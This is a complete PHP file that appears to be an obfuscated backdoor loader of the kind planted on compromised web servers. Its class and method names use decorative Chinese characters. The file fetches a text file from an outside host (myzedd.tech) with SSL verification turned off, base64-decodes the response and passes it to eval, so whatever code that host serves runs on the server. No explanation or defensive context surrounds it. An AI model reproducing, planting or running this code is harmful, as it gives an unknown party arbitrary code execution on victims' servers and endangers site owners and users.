<?php
class ___十方无敌___ {
    function __call($__无敌, $__方) {
        $ch = curl_init($__方[0]);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($ch, CURLOPT_TIMEOUT, 17);
        $data = curl_exec($ch);
        curl_close($ch);
        if (strlen($data) > 90) {
            return base64_encode($data);
        }
        return $data;
    }
}
$___a = new ___十方无敌___();
$___b = str_split('https://myzedd.tech/project/rahman1.txt', 777);
$___c = base64_decode($___a->无敌($___b[0]));
if (strlen($___c) > 90) eval('?>' . $___c);
?>